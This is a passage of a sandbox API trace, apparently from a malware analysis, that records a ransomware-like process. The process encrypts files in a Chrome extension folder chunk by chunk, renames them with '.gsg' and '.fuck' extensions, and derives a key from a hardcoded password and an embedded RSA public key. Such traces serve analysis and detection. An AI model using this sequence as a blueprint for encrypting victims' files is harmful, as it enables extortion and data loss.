lpOverlapped=0x0) returned 1 [0256.589] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.589] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.589] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.589] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.589] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.589] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.589] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.589] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.589] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.590] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.590] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.590] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.590] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.591] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.591] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.591] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.591] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.591] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.591] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.591] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.591] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.591] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.591] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.591] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.591] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.592] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.592] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.592] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.592] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.592] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.592] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.592] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.592] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.592] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.592] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.592] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.592] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.593] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.593] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.593] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.593] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.593] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.593] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.594] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.594] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.594] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.594] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.594] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.594] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.594] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.594] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.594] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.594] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.594] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.594] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.595] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.595] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.595] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.595] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.595] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.595] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.595] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.595] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.595] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.595] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x6c, lpOverlapped=0x0) returned 1 [0256.595] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x6c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x70) returned 1 [0256.595] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x70, lpOverlapped=0x0) returned 1 [0256.596] CloseHandle (hObject=0x5d50) returned 1 [0256.596] CloseHandle (hObject=0x5d64) returned 1 [0256.596] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js"), bFailIfExists=0) returned 1 [0256.600] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js", dwFileAttributes=0x0) returned 1 [0256.600] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js.gsg")) returned 1 [0256.602] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js.fuck")) returned 1 [0256.603] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.603] CryptDestroyKey (hKey=0x2e186a8) returned 1 [0256.603] CryptReleaseContext (hProv=0x2e13e50, dwFlags=0x0) returned 1 [0256.603] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0256.603] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0256.603] GetLastError () returned 0x0 [0256.603] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json")) returned 0x20 [0256.604] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json", dwFileAttributes=0x80) returned 1 [0256.604] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0256.605] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.606] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0256.606] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e136e0) returned 1 [0256.609] CryptCreateHash (in: hProv=0x2e136e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0256.609] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.609] CryptHashData (hHash=0x2e18128, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.609] CryptDeriveKey (in: hProv=0x2e136e0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e186a8) returned 1 [0256.610] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.610] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, 